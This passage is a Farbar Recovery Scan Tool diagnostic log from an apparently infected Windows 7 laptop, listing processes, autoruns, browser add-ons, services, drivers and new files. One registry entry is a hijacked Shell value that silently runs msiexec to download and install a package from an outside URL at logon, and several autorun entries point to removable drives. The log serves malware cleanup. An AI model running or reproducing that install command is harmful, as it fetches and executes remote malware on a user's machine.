Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-04-2017 01 Ran by Tomash (administrator) on TOMASH-PC (19-04-2017 09:28:34) Running from D:\INSTALKI\Bezpieczenstwo Loaded Profiles: Tomash & UpdatusUser (Available Profiles: Tomash & UpdatusUser) Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States) Internet Explorer Version 8 (Default browser: FF) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (ASUSTeK Computer Inc.) C:\Windows\System32\FBAgent.exe (ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe (ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe (CANON INC.) C:\Program Files\Canon\DIAS\CnxDIAS.exe (Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe (Foxit Software Inc.) C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe () C:\Program Files (x86)\MyPublicWiFi\PublicWiFiService.exe (Nero AG) C:\Program Files (x86)\Common Files\Nero\Nero BackItUp 4\NBService.exe () C:\Windows\SysWOW64\spdsvc.exe (Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (Microsoft Corporation) C:\Windows\System32\alg.exe (AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe (ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe (ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\ATKOSD.exe (ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\WDC.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (AlcorMicro Co., Ltd.) C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe (ELAN Microelectronic Corp.) C:\Program Files\Elantech\ETDCtrl.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe (Dexpot GbR) C:\Program Files (x86)\Dexpot\dexpot.exe (Spotify Ltd) C:\Users\Tomash\AppData\Roaming\Spotify\SpotifyWebHelper.exe (Flux Software LLC) C:\Users\Tomash\AppData\Local\FluxSoftware\Flux\flux.exe (Dexpot GbR) C:\Program Files (x86)\Dexpot\Dexpot64.exe (Dexpot GbR) C:\Program Files (x86)\Dexpot\plugins\SevenDex.exe (ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe (ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe (ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControlUser.exe (Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe () C:\Program Files (x86)\PLAY ONLINE\PLAY ONLINE.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe () C:\ProgramData\PLAY ONLINE\OnlineUpdate\ouc.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe () D:\INSTALKI\Bezpieczeństwo\FRST64.exe ==================== Registry (Whitelisted) ==================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2016-08-22] (AlcorMicro Co., Ltd.) HKLM\...\Run: [ETDWare] => C:\Program Files\Elantech\ETDCtrl.exe [621440 2009-09-30] (ELAN Microelectronic Corp.) HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-04-04] (AVAST Software) HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes) HKLM-x32\...\Run: [ATKOSD2] => C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe [6998656 2009-10-26] (ASUS) HKLM-x32\...\Run: [ATKMEDIA] => C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe [170624 2009-08-19] (ASUS) HKLM-x32\...\Run: [HControlUser] => C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControlUser.exe [105016 2009-06-19] (ASUS) HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation) HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [28330072 2017-04-14] (Dropbox, Inc.) HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Run: [Dexpot] => C:\Program Files (x86)\Dexpot\dexpot.exe [1843704 2016-07-19] (Dexpot GbR) HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Run: [Spotify Web Helper] => C:\Users\Tomash\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-04-12] (Spotify Ltd) HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Run: [f.lux] => C:\Users\Tomash\AppData\Local\FluxSoftware\Flux\flux.exe [1024240 2016-12-06] (Flux Software LLC) HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj88NkZWNkY3FjH5MdzLMkVYFjY8MdU5OWlYRYZQNYRLMq== /q HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\MountPoints2: {273c6e7a-6adc-11e6-9e65-20cf30372acf} - G:\AutoRun.exe HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\MountPoints2: {6f788fd8-6871-11e6-a82a-20cf30372acf} - F:\AutoRun.exe HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\...\MountPoints2: {6f788ff2-6871-11e6-a82a-20cf30372acf} - G:\AutoRun.exe ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-04-04] (AVAST Software) ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-04-04] (AVAST Software) ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2013-02-08] (Autodesk, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-14] (Dropbox, Inc.) ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-04-14] (Dropbox, Inc.) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 194.204.152.34 194.204.159.1 Tcpip\..\Interfaces\{27397F01-943A-47FC-828D-0B4644F56FD7}: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{280FC4C6-7FCC-4E5C-AE65-55511251FB05}: [DhcpNameServer] 194.204.152.34 194.204.159.1 Tcpip\..\Interfaces\{333F9C12-DD8E-4D59-9414-9651D102B9D7}: [NameServer] 194.204.159.1 194.204.152.34 Tcpip\..\Interfaces\{333F9C12-DD8E-4D59-9414-9651D102B9D7}: [DhcpNameServer] 194.204.159.1 194.204.152.34 Tcpip\..\Interfaces\{5E095B9E-40B8-4BB9-A02A-4ACDA82F55CA}: [NameServer] 194.204.159.1 194.204.152.34 Tcpip\..\Interfaces\{5E095B9E-40B8-4BB9-A02A-4ACDA82F55CA}: [DhcpNameServer] 194.204.159.1 194.204.152.34 Tcpip\..\Interfaces\{CBB04726-C22C-4FDF-9940-6B08947FAC10}: [DhcpNameServer] 192.168.42.129 Internet Explorer: ================== HKU\S-1-5-21-1673507172-2206377428-1642603207-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-04-04] (AVAST Software) BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-08-23] (Oracle Corporation) BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-04] (AVAST Software) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-08-23] (Oracle Corporation) Toolbar: HKU\S-1-5-21-1673507172-2206377428-1642603207-1000 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-21] (Microsoft Corporation) Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-21] (Microsoft Corporation) Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-21] (Microsoft Corporation) Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-21] (Microsoft Corporation) FireFox: ======== FF DefaultProfile: nas8ob0b.default FF ProfilePath: C:\Users\Tomash\AppData\Roaming\Mozilla\Firefox\Profiles\nas8ob0b.default [2017-04-19] FF user.js: detected! => C:\Users\Tomash\AppData\Roaming\Mozilla\Firefox\Profiles\nas8ob0b.default\user.js [2017-04-02] FF Homepage: Mozilla\Firefox\Profiles\nas8ob0b.default -> hxxp://www.linuxmint.com/start/sarah FF Session Restore: Mozilla\Firefox\Profiles\nas8ob0b.default -> is enabled. FF Extension: (Goo.gl url) - C:\Users\Tomash\AppData\Roaming\Mozilla\Firefox\Profiles\nas8ob0b.default\Extensions\@googlurl.xpi [2016-08-22] FF Extension: (Flash Video Downloader - YouTube HD Download [4K]) - C:\Users\Tomash\AppData\Roaming\Mozilla\Firefox\Profiles\nas8ob0b.default\Extensions\artur.dubovoy@gmail.com [2017-02-21] FF Extension: (British English Dictionary (Marco Pinto)) - C:\Users\Tomash\AppData\Roaming\Mozilla\Firefox\Profiles\nas8ob0b.default\Extensions\marcoagpinto@mail.telepac.pt [2017-03-29] FF Extension: (Vimperator) - C:\Users\Tomash\AppData\Roaming\Mozilla\Firefox\Profiles\nas8ob0b.default\Extensions\vimperator@mozdev.org.xpi [2017-02-18] FF Extension: (Adblock Plus) - C:\Users\Tomash\AppData\Roaming\Mozilla\Firefox\Profiles\nas8ob0b.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-11-24] FF Extension: (Disable TLS Certificate Transparency) - C:\Users\Tomash\AppData\Roaming\Mozilla\Firefox\Profiles\nas8ob0b.default\features\{8a5b642f-3c18-4abf-a856-c5812c8396f2}\disable-cert-transparency@mozilla.org.xpi [2017-04-18] FF Extension: (Disable Prefetch) - C:\Users\Tomash\AppData\Roaming\Mozilla\Firefox\Profiles\nas8ob0b.default\features\{8a5b642f-3c18-4abf-a856-c5812c8396f2}\disable-prefetch@mozilla.org.xpi [2017-04-18] FF Extension: (Site Deployment Checker) - C:\Program Files (x86)\Mozilla Firefox\browser\features\deployment-checker@mozilla.org.xpi [2017-03-29] [not signed] FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF48 FF Extension: (Avast SafePrice) - C:\Program Files\AVAST Software\Avast\SafePrice\FF48 [2017-04-04] FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF48 FF Extension: (Avast Online Security) - C:\Program Files\AVAST Software\Avast\WebRep\FF48 [2017-04-04] FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF48 FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF48 FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_127.dll [2017-03-15] () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_127.dll [2017-03-15] () FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2017-01-19] (Foxit Corporation) FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2017-01-19] (Foxit Corporation) FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2017-01-19] (Foxit Corporation) FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2017-01-19] (Foxit Corporation) FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-08-23] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-08-23] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-04-18] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-04-18] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-11] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-11] (Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.) Chrome: ======= CHR Profile: C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default [2017-04-19] CHR Extension: (Prezentacje Google) - C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-02-10] CHR Extension: (Dokumenty Google) - C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-10] CHR Extension: (Dysk Google) - C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-10] CHR Extension: (YouTube) - C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-10] CHR Extension: (Avast SafePrice) - C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2017-03-25] CHR Extension: (Arkusze Google) - C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-02-10] CHR Extension: (Dokumenty Google offline) - C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-10] CHR Extension: (Avast Online Security) - C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2017-04-09] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-25] CHR Extension: (e-pity - dodatek) - C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default\Extensions\ofoeigeaodhbjogdigckajfhjbonaofg [2017-02-13] CHR Extension: (Gmail) - C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-02-10] CHR Extension: (Chrome Media Router) - C:\Users\Tomash\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-04] CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg] - hxxps://clients2.google.com/service/update2/crx ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7398336 2017-04-04] (AVAST Software s.r.o.) R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [261712 2017-04-04] (AVAST Software) R2 Canon Driver Information Assist Service; C:\Program Files\Canon\DIAS\CnxDIAS.exe [4940760 2012-09-04] (CANON INC.) S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-08-23] (Dropbox, Inc.) S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-08-23] (Dropbox, Inc.) R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [46408 2017-04-14] (Dropbox, Inc.) R2 FoxitReaderService; C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe [1659592 2017-02-24] (Foxit Software Inc.) S2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [346976 2011-03-14] () R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes) R2 MyPublicWiFiService; C:\Program Files (x86)\MyPublicWiFi\PublicWiFiService.exe [756224 2013-04-03] () [File not signed] S3 PLAY ONLINE. RunOuc; C:\Program Files (x86)\PLAY ONLINE\UpdateDog\ouc.exe [246112 2016-08-22] () R2 Samsung Printer Dianostics Service; C:\Windows\SysWOW64\\spdsvc.exe [499000 2016-08-17] () R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited) S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed] S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation) ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [307736 2017-04-04] (AVAST Software s.r.o.) R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [189768 2017-04-04] (AVAST Software s.r.o.) R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334088 2017-04-04] (AVAST Software s.r.o.) R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [48528 2017-04-04] (AVAST Software s.r.o.) S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-04-04] (AVAST Software) R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [32600 2017-04-04] (AVAST Software) R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [127112 2017-04-04] (AVAST Software) R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-04-04] (AVAST Software) R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-04-04] (AVAST Software) R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1005048 2017-04-04] (AVAST Software) R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [556784 2017-04-04] (AVAST Software) R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [164064 2017-04-04] (AVAST Software) R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-04-04] (AVAST Software) R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77440 2017-03-22] () R3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [223744 2016-08-22] (Huawei Technologies Co., Ltd.) U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2011-10-24] (Huawei Technologies Co., Ltd.) R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [186304 2017-04-18] (Malwarebytes) R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [111544 2017-04-19] (Malwarebytes) R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [43968 2017-04-19] (Malwarebytes) R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [251832 2017-04-19] (Malwarebytes) R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [82720 2017-04-19] (Malwarebytes) R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1799680 2016-08-22] () S1 VBoxNetAdp; C:\Windows\System32\DRIVERS\VBoxNetAdp6.sys [131144 2017-01-16] (Oracle Corporation) S3 dbx; system32\DRIVERS\dbx.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2017-04-19 08:41 - 2017-04-19 08:41 - 00000000 ____D C:\ProgramData\SWCUTemp 2017-04-18 22:38 - 2017-04-18 22:38 - 00000000 ____D C:\Users\Default\AppData\Local\Dropbox 2017-04-18 22:38 - 2017-04-18 22:38 - 00000000 ____D C:\Users\Default User\AppData\Local\Dropbox 2017-04-18 22:11 - 2017-04-19 08:11 - 00082720 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys 2017-04-18 22:11 - 2017-04-19 08:10 - 00251832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2017-04-18 22:11 - 2017-04-19 08:10 - 00111544 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys 2017-04-18 22:11 - 2017-04-19 08:10 - 00043968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys 2017-04-18 22:11 - 2017-04-18 22:11 - 00186304 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys 2017-04-18 22:11 - 2017-04-18 22:11 - 00001867 _____ C:\Users\Public\Desktop\Malwarebytes.lnk 2017-04-18 22:11 - 2017-04-18 22:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes 2017-04-18 22:11 - 2017-04-18 22:11 - 00000000 ____D C:\ProgramData\Malwarebytes 2017-04-18 22:11 - 2017-04-18 22:11 - 00000000 ____D C:\Program 